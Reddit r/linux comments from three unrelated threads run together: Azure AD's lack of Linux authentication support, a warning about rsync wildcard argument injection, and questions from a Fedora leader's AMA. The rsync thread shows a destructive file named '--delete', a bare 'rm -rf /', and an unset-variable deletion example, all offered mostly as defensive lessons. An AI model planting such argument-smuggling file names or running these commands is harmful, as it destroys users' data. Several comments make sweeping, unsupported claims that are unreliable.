Azure AD isn't meant to be a replacement for on-prem AD, [as recommended by Microsoft reps.](https://community.spiceworks.com/topic/1251024-migrate-to-azure-active-directory-from-on-premise-ad?page=1#entry-5156830) You lose traditional AD services such as GPOs, **it doesn't support Kerberos/LDAP auth**, and you authenticate across the open internet. Azure AD was primarily designed for cloud services, yet for some reason many businesses and MSPs have adopted it as a replacement for on-prem AD and patch it together with Intune, etc.

Azure AD DS is the correct replacement for on-prem AD. It **supports LDAP/Kerberos authentication**, GPOs, and authenticates over a VPN/secure connection. It's the equivalent of running a domain controller on an Azure VM and there are managed/unmanaged versions. This is what you are looking for.

[Docs comparing the different services.](https://docs.microsoft.com/en-us/azure/active-directory-domain-services/compare-identity-solutions)
Another example is the linux MS Teams Client. They keep stripping features that worked previously off for no reason. You can see only 4 members, no backgrounds, no guest login, no other notable features. Even the browser based version some more features. 

If you are using the browser version you get also stripped down features if the user agent specifies linux (!).
Anyone thinking Microsoft loves anything but money, is fooling themselves.
Microsoft has never loved Linux.
MS' "love" for linux refers to deploying on linux servers, eg on azure. Linux for desktop is not really relevant to their business.
Microsoft is a corporation, they don't "love" anything besides money and the more ways they can find to prevent people from switching to Linux, the better.  Why do you think there is so much focus on "interoperability"?  It's to stop people from saying screw you, I'm moving to Linux.
You definitely can.

https://docs.microsoft.com/en-us/azure/active-directory-domain-services/join-ubuntu-linux-vm

This information is centered on Azure VMs but I guarantee you that it works in any Linux OS.

You can also do it with BSD based OS, but realmd has not been ported so you need to setup winbind manually
Imagine thinking MS can take over linux and "extinguish" it. LOL. What kinda FUD is this?
I think you’re overthinking it. I’m sure it’s possible to do it.  But like with most things Linux, it’s up to the sysadmin to figure out how.  Asking the sales guys who are going to be windows/Microsoft centric (duh) how to do some technical stuff with Linux, of course you’re going to get bad responses. 

I get puzzled responses from my local grocery store stockers whenever I ask where to find a slightly rare item.  Doesn’t mean the grocery store is nefariously anti-couscous.
Look at what they've been doing to teams on linux.

That's just pure dickery for dickery's sake, man.

That said, wsl is incredibly handy when working as an admin in a mixed shop-- maybe it speaks to my weakness as a sysadmin but sometimes only core linux utils feel right for a job, even if it \*can\* be done with posh or whatever.
See you’re thinking wrong. Linux desktop isn’t the only GNU/Linux in the world, in fact it is least used Linux. When they refer to Linux, they primarily mean Embedded systems, IOT, and servers on their cloud. 
They have nothing to do with Linux desktop and I don’t think they need to mess around with it because Linux on desktop is not as robust as Windows or macOS plus they have no reason to love Linux desktop.
They have some apps, like Edge and Teams for Linux. That’s all I guess was wanted.
With respect to the authentication issue, usually I am willing to be charitable in my thoughts and say the problem is an oversight or a feature not yet implemented. Best to contact people and ask.

With respect to the MS folks loving Linux, the correct phrase is "loves making money with Linux."
You have to consider that MS primarily sees Linux as server and development platform, not desktop. So it's a choice of focus rather than malicious intent I would think. But nobody really knows, we can only just guess. I personally think that Microsoft has gradually transformed under visionary leadership in at least the last five years. I think the key is that it's a gradual change. You can't change every aspect of a company over night, neither can every single integration be coded.
It's possible with standard Kerberos and krb5-user package. Loads of banks do it.
Pretty sure AAD isn't a replacement for OnPrem AD? That would be AADDS. AAD is essentially a managed MS/365 account.
Sorry, did anyone think a for profit company can love an open competitor that they can't stop?

Under capitalism, if you're a for profit company, the only thing you care about is money. Anything else that you tell people is propaganda.
One use-case specific to your setup doesn't work -> 100% IRREFUTABLE PROOF THAT MS DOESNT LOVE LINUX.

See the problem there?
Microsoft is a trash company, even before this, and will continue to be a trash company into the future. The fact that GitHub has even survived their ownership is nothing short of a miracle. But if you have been to GitHub recently, you know it is slowly devolving into a Microsoft money tree....
I'm quite sure that AAD auth over the Internet works quite fine, maybe it's your organisation's policies that don't allow that (I've hit that one myself).
To be fair, they don't even want Windows 7, 8.1, Home version and Server to use AAD either, it's basically reserved to Windows 10 Pro at the moment.
Try pam-aad.

https://github.com/CyberNinjas/pam_aad
ActiveDirectory is an intentionally non-compatible implementation of the Kerberos and LDAP protocols. Microsoft could have made it compatible with the already existing open source standards when they launched Active Directory twenty years ago with Windows 2000. They didn't then and they haven't since. They didn't make it compatible, because that wasn't what they wanted. They don't want cross-compatibility, they want market control.
Microsoft has never once claimed to love desktop Linux.  It's always been about servers (and now mobile, apparently).

This isn't surprising at all to me, and I'm not bothered either.  It's not like their reputation can get any lower at this point.  I would never work for a company that used that garbage and neither should you.
They fight linux in any way they can and they fight dirty. Decision makers in the enterprise never seem to care for linux support and you end up being a second class citizen because of vendor lock-in.
This seems to be the direction they choose.

For Linux they'll provide a "preview" version of the app - not enough that it doesn't work, but enough for you to be annoyed, and possibly not able to do something essential that you need to.

In short, MS sucks as it always has, they **only** care about the MS ecosystem, and preach (inconsistent) multiplatform support just to lure more people in.
Why would you think otherwise? What gave you the impression Microsoft wanted to coexist with Linux? They want to absorb it. Like everthing else. 

I remember the 90s all too well. Do not ever trust them.
Anyone who thinks that Microsoft's intentions are anything less than to destroy Linux hasn't been paying attention the last 25 years. Sorry, but the history is there for anyone who cares to read it. And apparently many Linux users these days don't.
Anyone still looking for that proof simply hasn't been paying attention. I don't think more proof is going to sway them.

Look at the business model. Does embracing Linux openly and transparently make sense to their shareholders?
Maybe they neither "Love" nor "Hate" but just doesn't have this high on their priorities?
Microsoft is a company. Company's goal is to earn money, not to love OS or change world. And it's nothing wrong (if you want to make world better place start charity).
They cannot earn a lot from supporting free OS, so they don't have it high on thier priority list. Especially when they focus on thier new main product.
My opinion is that without the ability for Linux clients to authenticate against AzureAD, it simply will not succeed. Just like as if Azure in general were to not allow Linux installations/containers, etc, they would not succeed. Today, with Linux numbers being the majority of Azure, believe it or not Linux IS Microsoft's cash cow now.

For many companies AD/LDAP authentication with Linux is used, not just on this minuscule desktop Linux user base that enthusiasts like us consume, but rather on their Linux servers, which dominate the IT world.

Eventually, Microsoft learns of their idiocy with not allowing for compatibility, and forge a solution or their AzureAD never catches on, and they wander around aimlessly until they do away with it.
The company you should be bitching about is **Redhat** not Microsoft.

LDAP / OpenID is fucking garbage. Microsoft knows this which is why they made Active Directory. Linux vendors realize this too, which is why they all use Active Directory.

It's incumbent on Linux vendors to rewrite their shit to work with AD, not the other way around. See IMAP vs. MAPI. 

I worked on Netscape Directory Server back in the 1990s and OpenLDAP is still inferior to that, over 20 years later!  HP OpenMail was the only mail server other than Exchange that didn't suck. Microsoft bought it and killed it and nothing replaced it.

And that's on Redhat and other Linux vendors. They've had over 20 years and billions USD to make a functional authentication server and have done jack shit. 

Linux vendors have never bothered to make a functional replacement for Active Directory + Exchange. Linux enterprise software sucks in general.
Hasn't Microsoft put Microsoft Edge in beta for Linux along with MS Teams preview?
Microsoft loves Linux like a golddigger does to a old billionaire with memory loss.
But Miro$oft LoVEs Linux... /s
I think, 1000% fuck Microsoft.

Once I'm done with grad I'm switching back to Arch and never looking back.
i see a lot of people saying micosux is ok and vscode is great... microcrap hates linux no matter what the marketing morons say...microsoft is the enemy.
I just want to correct one single point:

> Linux Desktops can authenticate against LDAP and Kerberos (which are a large Block of ActiveDirectory)

Active Directory is akin to LDAP as moon is akin to cheese. AD just provides an LDAP interface which exposes the tiniest bit of what's stored inside AD. Been there, tried that, hit my head on many hard surfaces both proverbially and literally, but no. AD just provides a very limited LDAP interface. It is *not* LDAP.

Other than that, Microsoft loves Linux proportionally to the money they earn over it. That's it.
This is probably the route you would have to go, or use a VPN. 

https://github.com/MicrosoftDocs/azure-docs/issues/33412

This one is in network, so you would still have to do the above, but in case you hadn't seen it since code flow is being deprecated in August.

https://docs.microsoft.com/en-us/azure/active-directory/devices/howto-vm-sign-in-azure-ad-linux

I haven't used these, but they seemed like they might be relevant. Your mileage may vary

~~https://cyberninjas.github.io/aad-for-linux/~~

https://github.com/bureado/aad-login
It was a hellacious process to make a windows boot drive for gaming on a mac.  I’m a web developer and it was difficult even for me.  I know that’s not Linux, just my own experience with windows being a bastard.
After 20-something years of using Linux as the solo distribution of desktops, I'm surprised people thought that we could be cool with MS. Then I realise that people have no clue the struggle Linux had to go through in its tender age, and the cow-stuffings that MS put them/us through. The whole MS and Linux collaborations were a PR stunt to get Linux guys to look at Windows Software again and consider it. Some people drunk the Kool-Aid, some didn't. Now that they know it's a non-starter, it's back to wearing fatigues and boning each other with javelins. Ahhhh, the good old times are back again.
I stepped away from ms (no caps are intentional) when they axed windows XP. Just when a decent OS comes along.....
desktop linux is sucks anyway not even developers love it enough to fix this mess 

the only good thing about linux is the kernel
3. Extinguish.
"Hard" being relative, they obviously have the capability of doing this and are choosing not to.
Their new "crossplatform" initiative Maui supports most things but not Linux ofcourse.  At least there is flutter. I hate that you have to use Dart but I might have to just accept that to build beautiful cross-platform native performance apps.
Its not just Linux. Identity Management is a big issue in medium to large organizations - and there was a growing numbers of enterprise applications which use LDAP for authentication and authorization. This pulls the rug out from under them (unless they happen to be written in C# and run on MS-Windows servers.

I could understand them not wanting to come to the party in the first place, but turning up, peeing on the carpet then stealing all the drinks seems to be the new policy. Embrace, extend, extinguish - we were warned.
Well I mean android is Linux.
I don’t think it works with MacOS either
Can you stand up a samba 5 controller and join it to the domain and use it to authenticate against? I'd love to know this.
Microsoft is a huge capitalistic company. Bottom line- they will do whatever it takes to earn market share and more money. They would eat their young if it made more money. Microsuck gonna do what it does best.
They are just in their **embrace** phase.
There’s a lot that still needs to be worked out with integration between OSes, from Enterprise Level software to Domain Services.  With local token based authentication it has caused a number of issues that FreeIPA and other intermediary LDAP servers seem to be able to remedy.

Not really sure, all I know is there FreeIPA community is still growing and there’s plenty of kinks to thresh out, I would just breathe and dev a solution if it does not already exist.
Microsoft cannot stand anything that isn't Microsoft. They finally took over the US Military and turned their security into absolute candy for China and Russia to do whatever they want with it. ALL the US military switched from a unix/linux system to WINDOWS back when Obama was president.   


Nobody heard about, medias were silent. Now you can ask anyone in the military, they will ALL eat you alive, trying to preach to you how WONDERFUL windows is and how SECURE it is, MORE SECURE THAN LINUX :D :D :D :D :D :D   


Nothing like a good billion dollar deal and a ton of assholes lobbying politicians to vote for this, finally paid off.
Microsoft loves Linux because it's a cash cow. Same goes for open source stuff they medal in.
I'm sure the top of MS is up to the old games that it never stopped.

BUT the bottom of MS is fresh CS grads and all the good ones with be Linux users now. MS is being infected by Linux from the bottom up.
How about stop trolling MS for the fact that they don't make a software package for Linux that provides this functionality. Last time I looked Samba was partly compatible, not 100%
In my experience the only thing that Microsoft <3 is messing things up.  This includes their own "premium" proprietary software.
Organisations like Amazon will still happily move over to it, and say screw you to their Linux employees.
Google hates us to!

I have yet to get a Linux eMail client working with Gmail, Thunderbird is the only one but I have quit Mozilla

Google no longer allows un-approved apps to access their system
Did MS write "MS <3 Linux"? Oops! Typo. Meant "MS <========3 Linux". Sorry about the misunderstanding.
Microsoft loves money, Linux doesn't give Microsoft money.
A coworker has shown me a trick today. Imagine you have a nfs share with a folder "Documents". You want to copy them to your machine. So you type

    cd /mnt/nfs/Documents
    rsync -r * ~/Documents

And bam!!! - all you local documents are deleted. Why? Because the share contains a file named exactly "`--delete`", and since it gets sorted first, rsync thinks it to be an argument and deletes everything. 

Lesson1: never start file names with a dash. 

Lesson2: always use `--` to explicitly separate paths from arguments in scripts.

Lesson3: never use only `*` as a wildcard. A `./*` would save you in most cases, though commands that accept arguments between file names can still be tricked.
Yup. Simple injection attack. The biggest lesson there is to not blindly trust directories and filenames in shared and other directories.
Couple more based on my experiences:

- With `rsync` always use the dry run in verbose mode `rsync -rvn` for example to see what will be done in the real command. An additional `--stats` flag is also handy as it will give you a summary of number of files copied and deleted.
- When using wildcards first run the command with an `echo` in the front as in `echo rsync -r * ~/Documents` this will show you exactly what the command with expand into.
It's pretty old but still valid : https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

This could lead to privilege escalation and system infection if poorly written bash code was exploited thanks to those mistakes. Always use -- after your list of options, folks ! (and also, "{$variable}" instead of $variable)
Wouldn't it be safe to just use a period instead of a star? That means to rsync the current folder and everything in it.

```
cd source
rsync -a . ~/Documents/
In this scenario, you're just using rsync wrong by globbing. Use `-avzSH`

But for `rm -rf` prevention in home, I put a file named `-i` there in case some script screws up!
I once experienced a subfolder named “${HOME}”, as I recall escaping with “rm -r $\\{HOME\\}” ensured that folder would be removed, otherwise without escaping that command would have deleted the user’s home folder.
Lesson 4: Use [ShellCheck](https://www.shellcheck.net/) regularly to check for other common errors/code smells in your scripts ;). (This is [SC2035](https://github.com/koalaman/shellcheck/wiki/SC2035), by the way)

Seriously, though, ShellCheck has improved my scripts tremendously and made them more robust. It does not replace a proper code review, though.
I wonder if these new-fangled shells such as [`nushell`](https://www.nushell.sh/) address this. After all, all it needs is signaling the application that this argument is results from a glob expansion.

I mean it's not really optimal that this happens, even if there is the fringe case where it could be useful. For example it's pretty much impossible in Windows, as it is the business of the application to perform glob expansion.
That's good help here, thanks for this.

Also be sure to memorize the difference between

    rsync /foo/bar host:

and


    rsync /foo/bar/ host:
Lesson 4: Unix and its clones all *suck*. This is pretty old but mostly still valid: [The UNIX-HATERS Handbook](http://web.mit.edu/~simsong/www/ugh.pdf). Start reading from the paragraph starting with "We mentioned that the shell performs wildcard expansion" on page 67 (PDF page number, not book page number).
I'm not sure when I got into the habit of abiding by "Lesson 3" (always  '`./*`', never '`*`'), but this post makes me incredibly grateful for having it.
Lesson 0: --dry-run

Also using rsync is a pretty fast way to delete a really large directory structure, but not as fast as find -delete!
Reminds me GOG Simcity 4 uninstaller which can [delete](https://www.gog.com/forum/simcity_series/warning_be_careful_uninstalling_simcity_4) entire "Documents" folder
One time I accidentally deleted all files in my home dir by putting a space between the dir structure to the file and wildcard.
With great power comes great responsibility
Never had this happen but I've come close.  I had entered something into the cli that was incorrect which resulted in files with names like '--something' getting created and every time I'd do 'ls *' afterwards I'd get errors about invalid arguments.
> explain "cat /tmp/\*.log" 

was a SDE interview question at Amazon. You can fill 15m talking about the implications and why that line has no business being in any script that affects production.
Lesson4: use a trailing slash when syncing directories/
>Lesson3: never use only `*` as a wildcard. A `./*` would save you in most cases, though commands that accept arguments between file names can still be tricked.

Commands that accept arguments between filenames are not a reason `./*` can be tricked. Try `echo ./*` and you will see that all of the globbed files are prefixed by `./`. This is true even if there are spaces or other special characters in the name as they will be escaped, at least in `bash` and `dash`.
Whaaaaat that is crazy. I never knew this was a thing
That's janky and quite frankly a failing of the tool.
This is surprising, yet also makes sense. Thanks for sharing.

The best solution I see is to not blindly use wildcards. As a matter of preference, I'd probably go for `rsync -r . ~/Documents`.

Also, I don't understand lesson #2 as written.
Make a habit if testing wildcards and regex with echo before using it in a real command.


echo * will would have shown the interesting file :)
I remember an O.S. long time ago, when Linux was not a thing, where such parameters were passed as is to applications, which had to resolve wildcards and globbing themselves. There were libraries helping, but the whole system was built this way.
What am I doing wrong here?

    ~/test/testDir1> find .
    .
    ./--delete
    ./testDir1File.txt

    ~/test/testDir1> find ../testDir2
    ../testDir2
    ../testDir2/testDir2File.txt
    ../testDir2/pleaseSaveMe.txt

    ~/test/testDir1> rsync -r * ../testDir2

    ~/test/testDir1> find ../testDir2
    ../testDir2
    ../testDir2/testDir2File.txt
    ../testDir2/testDir1File.txt
    ../testDir2/pleaseSaveMe.txt
Lots of folks trying their hardest to sound smart in the comments. I'm just gonna say thanks for the heads up.
I never thought of starting filenames with anything other than \[a-z0-9.\].
I have never used \* in my life.

Now I feel very good about myself.
Lesson 4: If someone creates a file called --delete on a server you control, lock or delete their account. It's a malicious act and they shouldn't be trusted with access to your systems.
Wouldn't this be a valid bug report?
How come rsync isn't smart enough to realize it's not a command but just a file/folder name? It has been around for so long you'd think it would be fixed lol.
Wouldn't  "*"  be enough?
Wow, that could really stink. I frequently use the file list argument.
Interesting, so using -- explicitly means something in most shells? Did not know this, is this is posix?
This used to be prevented by `bash`, but then they reverted the change. I forget why.
```set -o noglob```
I'm always afraid one of my process substitution commands is going to do something unexpected and harmful.
Usually there's nothing worse than an error because I target "/dev/fd/63" instead of the expected output of "<(find /zzyx -type f -name \*.flac)" or whatever. I do stuff like that all the time.
Or https://man7.org/linux/man-pages/man8/blkdiscard.8.html
I have a love-hate relationship with rsync. Used it for years. I love it when it works. I hate when it does not know what I meant for it to do.
Can someone explain lesson 2 to me?
[deleted]
reminds me of that xkcd comic about the student called bobby droptables
    md test
    cd test
    touch foo bar baz '-i'
    \rm *


A variation you may use for dirs with important files to guard against `rm`
"Strings are easy" is the biggest trap for computer noobs in general. 

Read Chomsky hierarchy first and only then say strings (CLI) are easy. This is literally the first semester of my program.
Here's another one to watch out for.


    myDir="/Path/To/Some/Files"  
    ...  
    rm -rf -- ${nyDir}/  

Due to a typo, you just tried to delete `/` because  `myDir` != `nyDir`.  

A safer way would be: `rm -rf -- ${nyDir?}`

This will produce the error: "bash: nyDir: parameter not set"
This is so stupid and bash is full of crap like that that serve no purpose but can cause huge damage.
Is this kind of thing possible for CLI tools that are written in statically typed compiled languages? I would think in those that they would know `--delete` is a string and treat it as the file name, not an arg.
And that is the story of why people made GUIs.
So... just use a GUI and avoid all the headache?
My way works too!
technically this only deletes all your /Documents.

 if you had a folder named /documents, those would be fine b/c the little d saved you.

 and all the rest of your files would be fine too.
[deleted]
    alias rsync="rsync -rvn"

EDIT: 

Not sure why this was downvoted. It's very good advice. If you need to run any command without the alias, just append a forward slash;

> \rsync

Zero overhead, and it protects you because it will always do a dry run first...
What's wrong with cp -R .

Or tar -zcf then copy 1 file
` $ rm -rf /`
Who the f*ck names files with “—delete”?

Why?
Why with double dash?
Hello everyone! I'm Matthew Miller, Fedora Project Leader and Distinguished Engineer at Red Hat. With no particular advanced planning, I've done an AMA here [every two years](https://www.reddit.com/r/linux/wiki/calendar#wiki_completed_amas)... and it seems right to keep up the tradition. So, here we are! Ask me anything!

Obviously this being `r/linux`, Linux-related questions are preferred, but I'm also reasonably knowledgeable about photography, Dungeons and Dragons, and various amounts of other nerd stuff, so really, feel free to ask anything you think I might have an interesting answer for.

5:30 edit: Whew, that was quite the day. Thanks for the questions, everyone!
1. How's the partnership with Lenovo going? When are they going to officially support & ship Fedora on their other laptop models? (I have a Lenovo laptop that runs Fedora, and it would benefit from official support — for instance, the fingerprint sensor currently doesn't work due to the lack of drivers.)
2. Are you aware of any other hardware vendors that plan to ship & support Fedora on their hardware? Are you doing anything to convince them to?
3. Is there any work planned to optimize boot-time performance, particularly on non-SSD machines? Said laptop (which, other than the lack of SSD, is a pretty swift machine) currently boots in about 1.5 *minutes*, which is painfully slow, to put it mildly. And this is with some manual optimizations that I've done on my system, the stock Fedora installation boots even slower.
Has the purchase by IBM had any impact on your job and on Fedora?
Any thoughts about adding in BTRFS snapshots by default and a method to rollback to other snapshots at boot by default in Fedora 35 or 36?
A baseball cap with the fedora logo on it would be a hilarious merch option that I've been looking to purchase for years. It doesn't exist. Why not? 

We run our foundry server off of a fedora node so you're directly responsible for keeping our DnD campaign moving. Thanks for all your work!
What is your employers view on work from home after the lockdowns end?
What do you think about the community replacements for CentOS now that CentOS Stream exists?
I was able to get a fedora t-shirt by showing my laptop booting fedora at a tech conference. Considering that most in-person conferences have yet to re-assemble, can a fedora merch site be set up with a portion of the proceeds going to open source projects?
I would love a blue fedora, another fedora t-shirt, or even a baseball cap with fedora on it.
What part of the Fedora project do you think has the highest need for volunteers?
1. Is *rpm-ostree* the future of Fedora?
1. Is Silverblue, in the long run, a substitute for traditional Workstation?
1. Is Flatpak aimed to substitute RPM for Desktop Apps in Fedora Repos?
1. Is there an educated guess for when Silverblue will be a a big thing for Fedora (and not an *emerging edition*)?
Is there any competition between CentOS, RHEL and Fedora employees / team members?
Nothing to ask. Just wanna say thank you for everything! Viva La Fedora!
What are some of the biggest factor's that are making Linux hard for the general public to be accepted?
So here's a thing im bit worried about: 

How active is KDE team internally? Is there any reason to move away from fedora if I use/depend on KDE? Will KDE get deprecated in a planned manner in some time frame?
Would you argue about “which is the best distro” or are you an “as long as it gets the job done” person?

I’m asking because I prefer more casual questions with casual answer rather than technical deep questions.
Any thin and light laptop you would recommend as a daily driver?
This has been talked about lightly on discussion.fp.o, but I’ll ask here as well. What are your opinions on Linux and gaming? Do you do any gaming on Linux, and if yes, how has your experience been? What do you think Fedora and the Linux community as a whole needs to do to push gaming further? What are your opinions on Linux gaming being largely back by proprietary software (Steam)?
https://www.zdnet.com/article/hard-work-and-poor-pay-stresses-out-open-source-maintainers/

A Tidelift survey found that almost half of code maintainers aren’t paid at all. How are they making a living so they can stay online to maintain the software?
How do you distinguish between the use cases where people should use Fedora and the use cases where people should use Debian?
So I’ve had Fedora 34 on my dell XPS 15 9570 because of gnome 40 and it worked great but since it’s a Nvidia optimus Laptop Nvidia drivers were kinda difficult to install and my steam games didn’t work so I’ve moved away to Manjaro

Is there anything planned to make it easier for the average user to install Nvidia drivers!
Red Hat (and Fedora) seems one of the most influential company in the linux desktop: you develop, propose and early adopt the newest technologies (e.g. systemd, wayland, pipewire, flatpaks, portals,...)

What other distros do you feel like are backed by a very propositional company and what's some "major" project you look forward from them?

Some years ago I would have said Canonical + Ubuntu, although during the last few years they got shutdown by many in the community and they no longer seem to be as much active in developing "the next big thing". What's the secret behind Fedora? Why aren't you shut down like Ubuntu/Canonical? And why do you think Fedora isn't considered The Distro for an entrylevel users as much as Ubuntu?
Are there official plans to support Raspberry Pi 4 ? (downloading the aarch64 image does work but wanted to know if there is something official in the pipeline).
Is there any plan to turn sub-pixel font rendering on by default?
What's your personal feeling about gnome 40?
no questions, just a serious thank you
As a photography enthusiast, how do you find working with RAWs, processing, editing, etc under Linux? Any FOSS tool recommendation for that matter? thanks!
How are things?
I like Fedora but every time I try to use it I get the perception of poorer performance (slow boot times, jittery animations, etc.) that I don't experience on the same hardware with other distros.

So my question is, is Fedora making trade-offs for performance for other goals (security, easy of debugging, not excessively patching upstream, I don't know)?

I obviously don't expect you to personally spend any time troubleshooting but was curious if it's something you've heard of before or if there might be an intentional reason for it.
FOSS is awesome but doesn't always cover all software needs for users. Installing commercial software outside the standard repository system is frequently messy and updating applications is even worse.


Will Fedora consider implementing some kind of means for better distribution of commercial software through a software store/repository for commercial software? It would probably entice more development for Linux, improve user experience and add a revenue stream for FOSS projects.
I use fedora on both my work pc's (by choice!) and I love it, why do you use fedora other than you work on the project, just why do you like it?
[deleted]
What do **you** want to see/implement in the next Fedora release?
I'm being mean to all sides, but still.

What is the program/package you have the most struggle with? \[Compiling / Maintaining / etc.\]
As a novice desktop Linux user, what goes into maintaining and creating a new distro? From the end users perspective, it seems quite simple: custom package manager and custom kernel (ik there's *alot* to those, but what requires such a big team)? Can you explain some less obvious challenges of creating and maintaining a distro?
What do you think of other distros that use .rpm packages? I mean OpenSUSE and OpenMandriva (Mandrake / Mandriva).  
Is any collaboration or joint projects possible? Or is there anything in these projects that you could use in Fedora? Eg LLVM/Clang by default, LTO and PGO like in OpenMandriva etc?
Hey there Matthew, do you personally trust Btrfs with your data?
Are there any plans to implement an 'installed' flag/indicator in `dnf search` as in `pacman -Ss` and `apt search`? It's a simple, but useful feature IMO.

for instance:

`pacman -Ss alacritty` returns `community/alacritty 0.8.0-1 [installed]` 

and

`apt search mate-terminal` returns `mate-terminal/stable,now 1.20.2-2 amd64 [installed,automatic]`
How did you deal with the "yOu hAvE tHe fAcEbOoK OS" thing?
What computer brand you use in your daily work?
In the top rated comment two years ago, you spoke about the changes you'd like to see in RH infrastructure.

Comments on its current state and what you'd like to see next?
What are your thoughts on SUSE and openSUSE and YAST in particular ?
what is your favourite hat?
4d6 drop lowest or Point Buy?
What do you think about pine64 producs, like the pinephone and pinebook pro?
Do you guys at fedora have any plans on having a pantheon fedora spin? i would love to have that
Similar to the question about KDE, what are your plans for Xfce/MATE, seeing as those are important Fedora spins (at least for me) and are known for slower development? Does Red Hat support those?
What are your favorite PC-games?
Is it true that Fedora is a pretty big contributor to Linux, especially in new technologies, when compared to distros such as Ubuntu?
Hi Matt, Akashdeep here!

Why did we stop having distinct names for every release of Fedora?
Is it possible to install Fedora from scratch (i.e. not using an ISO image)?
I am about to install Fedora on my system for the first time. Any tips about using it? Thanks for the ama
Hi. Recently the Fedora team introduced a i3 spin. Are there any plans to make a sway spin?

Thanks for all the work you guys do. Love Fedora.
I know it's pretty much "the" distro for the corporate world,  but as a non-corporate Linux user, what advantages does Fedora bring over other distros like Arch or Ubuntu in the corporate environment?
Hi Matthew! why is Gnome so "pale" on Fedora? Files is light-grey, with white background and beige folder icons. Almost 0% color contrast and it hurts my eyes. Please just compare Fedora contrasts with Ubuntu's and see how comfortable for the eyes is to look at their Gnome.
I won't use Dark Adwaika because it's something half-baked and still doesn't look uniform on some apps. Please, take my message in consideration, I've using Fedora since version 12 and would love if you guys gave more attention to color contrast and fonts. Thank you!
Two questions:

Which is your preferred edition of Dungeons and Dragons? (Bonus: Why that one?)

More on-topic: Do you see the role of Fedora changing now that CentOS Linux has been phased out in favour of CentOS Stream? Do you think Fedora's role will change with regards to the larger Linux community or within the Red Hat family of distributions? I'm curious if we might see a change in Fedora's focus or lifespan to help fill the gap left by CentOS Linux being killed off.
Now that CentOS Stream exists... what is actually the point of Fedora?
Trek or Wars?
is Fedora silverblue future for fedora project?
What would be your favorite setting for a D&D 5e campaign?
Ha, no questions about D&D yet… 

What's your best tip for players to generate interesting backgrounds for any game? Not necessarily D&D specific as I assume you play other systems/settings too…
7e5de7d466
What music do you enjoy?
Should we wait for Playground repo soon? Will it be something like Arch's AUR?
Hello :D! Thank you for this AMA!

1. How do you see the future relationship between the Fedora Project and the new communities forming around CentOS turning to Stream, like Rocky Linux & AlmaLinux?

2. I am really interested with your effort to make the Fedora & CentOS projects closer, with the new focus on CentOS Stream, how is that vision going? Will we see more symbiosis between them?

3. What do you think on the current efforts of OpenSUSE & Ubuntu to make projects similar to Silverblue?

4. What flavours of Fedora do you use :D?

5. How's the Fedora/Lenovo effort going on?

6. Cats or dog? Tea or Coffee? Am I asking too many questions :P?
Any chance that something like timeshift or snapper or some homegrown version of a tool like that will be integrated to manage BTRFS snapshots anytime in the nearish future?

BTRFS + a tool like that is really user friendly when its setup properly and allows average users to take advantage of BTRFS.

Automatic DNF snapshots, as well as the ability to boot into snapshots from GRUB are hugely convenient features.
Hi,

At this moment where i'm working we are doing a research to replace the CentOs instances we have to use the Fedora 34 server. In your opinion, which are the best approach to this? There are any security tips that we may take in consideration?

Like some users already asked it will be possible in the future, fedora have a lifespan ou 18/24 months between the release of a version and the end of life for that given version.

&#x200B;

Cheers
What plans are there in the future to make the Fedora Project more accessible?

**Background to the question** 

A year or three ago, I got more interested in Linux, and also in contributing back to the plethora of systems on which I relied. As such, I've helped  with issues on GNOME, I've been contributing and maintaining applications on [Flathub](https://github.com/eonfge), and I've contributed to the [Fedora Magazine](https://fedoramagazine.org/author/eonfge/). But, with Fedora Linux, I find that a lot of the application landscape is overly complex. ([See this diagram](https://apps.fedoraproject.org/), some of them don't even work)

I think it would be a massive improvement to the Fedora Linux landscape if a platform like Gitlab FLOSS could be adopted to make the project more accessible. GNOME has a lot of benefits from it, and even Flathub has a strong single-point-of-contact thanks to Github. Bohdi, Koji, the Red Hat bug tracker, Pagure... it's to scattered!

So yeah, that's why I'm asking. I like Fedora and I wish to contribute more, but as it stands, it's just not as easy and intuitive as other projects.
Why don't you use archlinux? (you asked for any questions)
Funny timing you do a QnA a week after i started messing around with fedora.

Praise first, holy crap the polish of this distro and the amazing integration of flatpak + dnf in the software center. Amazing work.
This distribution has made me fall in love with flatpak.

Question, how did you guys make the decision to switch to wayland by default? (pipewire as well)
Was it more of a feeling, or do you guys have a list of criteria that was only fulfilled as of late?

Extra optional question:
Do you like rougelikes/rougelites and if so, whats youre fav? :)
[deleted]
Thoughts on Debian? Have you contact to the DPL, or are you just doing your thing?
[deleted]
As a fellow gsoc-er, After cutting down the funding and time constraints from projects like gsoc and google code in, what other ways do you think is a good way for newbies to get introduced to the opensource community? would redhat/ibm be interested in hosting something like this to help more maintainers join the opensource community?  
PS: how much of impact did these program make till now?
If you could choose freely, what "distro" team would you merge with and why?
Will Fedora adopt systemd-homed? Why or why not?
Has changing the default interactive shell ever been considered? To maybe, eg: zsh, with a bit of extra sugar?
What's the current take on packages that need server-enforced updates? I mean for instance things like Discord and online games, where the service decides that either you update, or you don't get to connect. I think this is going to be an ever more pressing issue with the prevalence of online services.

Even Open Source isn't exempt from it. I work on a [fully open source 3D/VR environment](https://vircadia.com/) and we still must break the protocol sometimes.
Are there common myths or misconceptions about Fedora that you’d like to clarify?
I was wondering why Fedora signs the kernel for working with secureboot, but not the included dkms. For example everyone who might need Virtualbox on a secureboot-pc - it won't work without this workaround [https://gist.github.com/reillysiemens/ac6bea1e6c7684d62f544bd79b2182a4](https://gist.github.com/reillysiemens/ac6bea1e6c7684d62f544bd79b2182a4). Could you change that?
How do you feel about Apple’s switch to ARM? How problematic do you expect it to be?
Two:

1) How are you doing today?

2) What type of hat you love the most?
Hey Mathew,
How are you? I hope everything is going well. So yeah, I pretty new to Linux and wanted to know is fedora the best distribution out there? If yes, what's your favourite thing about it. Also, if fedora wouldn't have existed which distribution would you have used? 

Thank you for coming out here and interacting. 
Regards, 
A manjaro user
I'm very late to the party and I'm not sure if you'll get to this but here goes.

Have you or any of your devs ever worked/made an official product with Rust? Do you think that it could increase in importance in the near future?
[deleted]
Thanks for doing this, Matthew. Fedora is so important. Now that I'm using Stream, I benefit directly from everything the community does, and I'm in awe of how much is in Fedora.
What do you think about the whole AppArmor vs SELiunx discussion?  
And how do you install your software, Repo for updated dependencies, or Flatpak for better sandboxing (but maybe vulnerable dependencies)?
Does the team still use thinkpads?

I adore that I dropped Fedora on a recently purchased, spankin' new tiger lake thinkpad, and everything worked out of the box: fingerprint, 3 finger touchpad gestures, lap detection for power modes, active sleep mode, etc.

